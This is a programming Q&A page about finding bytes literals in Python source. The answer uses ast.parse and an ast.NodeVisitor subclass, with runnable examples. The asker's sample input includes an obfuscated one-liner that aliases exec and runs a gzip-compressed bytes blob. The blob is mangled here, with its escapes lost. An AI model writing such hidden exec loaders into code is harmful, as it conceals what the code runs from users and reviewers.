Find all occurrences of bytestrings in a Python code snippet

Question:

I’m trying to parse Python snippets, some of which contain bytestrings.
For example:

"""
from gzip import decompress as __;_=exec;_(__(b'x1fx8bx08x00xcbYmcx02xffxbd7ixb3xdaJvxdfxdfxaf /Ixf9xbarxc6%x81@x92kx9c)x16I,bx95Xmx87x92Z-$xd0x86x16x10LM~{Nx03xd7xc6xd7x9e%xa9xa9PE/xa7xcfxbeukxd3xacmxdd"x94x1b'xa5xdax04"Hx17xaexe3txf4xcdnx03xa9/&T>x13xdbug=x9fx13~x11xf6x9bxd7x15~xb2xe7xbcxe6xc2Kxb8x18x03xfd|[x7fxe8xb8I;xf0xf1x93xecx83x8eo15x8dCxfcxc6Ixf1xfdxf5rx8fxebx0fxd7xc53#xa8<_xb2Pyxbexe1xdexffx0fk&x93xa8Vx18x00x00'))

x = b"x1fx8bx08"

y = "hello world"
"""

Is there a regex pattern I can use to correctly find those strings?

I have tried implementing a regex query myself, like so:

bytestrings= re.findall(r'b"(.+?)"', text) + re.findall(r"b'(.+?)'", text)

I was expecting to receive an array

[b'x1fx8bx08x00xcbYmcx02xffxbd7ixb3xdaJvxdfxdfxaf /Ixf9xbarxc6%x81@x92kx9c)x16I,bx95Xmx87x92Z-$xd0x86x16x10LM~{Nx03xd7xc6xd7x9e%xa9xa9PE/xa7xcfxbeukxd3xacmxdd"x94x1b'xa5xdax04"Hx17xaexe3txf4xcdnx03xa9/&T>x13xdbug=x9fx13~x11xf6x9bxd7x15~xb2xe7xbcxe6xc2Kxb8x18x03xfd|[x7fxe8xb8I;xf0xf1x93xecx83x8eo15x8dCxfcxc6Ixf1xfdxf5rx8fxebx0fxd7xc53#xa8<_xb2Pyxbexe1xdexffx0fk&x93xa8Vx18x00x00', b"x1fx8bx08"]

Instead, it returns an empty array.

Asked By: ze'ev han

Answers:

This isn’t a job for regular expressions, but for a Python parser.

import ast

code = """
...
"""

tree = ast.parse(code)

Now you can walk the tree looking for nodes of type ast.Constant whose value attribute is a bytes object. (ast.Constant represents all literals as of Python 3.8; older versions used ast.Bytes for bytes literals.) Do this by defining a subclass of ast.NodeVisitor and overriding its visit_Constant method. This method is called on each node of type ast.Constant in the tree, letting you examine its value. Here, we simply append the matching values to a global list.

bytes_literals = []

class BytesLiteralCollector(ast.NodeVisitor):
    def visit_Constant(self, node):
        if isinstance(node.value, bytes):
            bytes_literals.append(node.value)

BytesLiteralCollector().visit(tree)
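
For anyone who wants something to paste and run, here is a minimal self-contained sketch of the same idea. The SAMPLE string and the find_bytes_literals helper are made up for illustration, and the results are kept on the visitor instance instead of in a global list so the helper can be called more than once.

```python
import ast

# Hypothetical sample input. The raw string keeps the backslash escapes
# intact so that the parser sees them exactly as they appear in source code.
SAMPLE = r'''
x = b"\x1f\x8b\x08"
y = "hello world"
z = f(b'abc', [b"d'e"])
'''


class BytesLiteralCollector(ast.NodeVisitor):
    """Collect the value of every bytes literal in a syntax tree."""

    def __init__(self):
        self.found = []

    def visit_Constant(self, node):
        # Constant nodes have no child nodes, so there is nothing further
        # to descend into here.
        if isinstance(node.value, bytes):
            self.found.append(node.value)


def find_bytes_literals(source):
    """Parse source and return its bytes literals in order of appearance."""
    collector = BytesLiteralCollector()
    collector.visit(ast.parse(source))
    return collector.found


print(find_bytes_literals(SAMPLE))
# [b'\x1f\x8b\x08', b'abc', b"d'e"]
```

Note that the list holds the evaluated bytes objects, not the original source text, and the quote characters inside a literal (as in the last one) need no special handling because the parser has already dealt with them.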

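The documentation for NodeVisitor is terse. Aside from the two documented methods visit and generic_visit, you can define visit_X, where X is the class name of any node type defined in the abstract grammar presented at the start of the ast documentation. visit dispatches each node to the method matching its class name and falls back to generic_visit, which visits the node's children, when no such method is defined.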
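
One consequence of that dispatch is worth a small sketch: once you define a visit_* method for a node type that has children, the children are only visited if you call generic_visit yourself. The class names and the sample source below are invented for the illustration.

```python
import ast

SOURCE = "f(g(b'abc'))\nx = b'top'"


class ShallowVisitor(ast.NodeVisitor):
    """Overrides visit_Call but does not descend into the call's children."""

    def __init__(self):
        self.calls = 0
        self.bytes_found = []

    def visit_Call(self, node):
        self.calls += 1  # traversal stops here: no generic_visit call

    def visit_Constant(self, node):
        if isinstance(node.value, bytes):
            self.bytes_found.append(node.value)


class DeepVisitor(ShallowVisitor):
    """Same as above, but keeps walking below each Call node."""

    def visit_Call(self, node):
        self.calls += 1
        self.generic_visit(node)  # visit the function name and arguments


shallow = ShallowVisitor()
shallow.visit(ast.parse(SOURCE))

deep = DeepVisitor()
deep.visit(ast.parse(SOURCE))

print(shallow.calls, shallow.bytes_found)  # 1 [b'top']
print(deep.calls, deep.bytes_found)        # 2 [b'abc', b'top']
```

The collector in this answer only overrides visit_Constant, and Constant nodes have no children, so it does not need the extra call.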

You can use print(ast.dump(ast.parse(code), indent=4)) to get a more-or-less readable representation of the tree that your visitor will walk.
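
As a small illustration, here is that call applied to a one-line input of my own choosing. The indent argument needs Python 3.9 or later, and the exact layout of the dump differs between Python versions, so treat the output as something to read, not something to compare against.

```python
import ast

# Hypothetical one-line input; the raw string preserves the backslashes.
source = r'x = b"\x1f\x8b\x08"'

dumped = ast.dump(ast.parse(source), indent=4)
print(dumped)
```

In the printed tree, the bytes literal shows up as a Constant node nested under the Assign node, which is the node the visitor's visit_Constant method receives.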

Answered By: chepner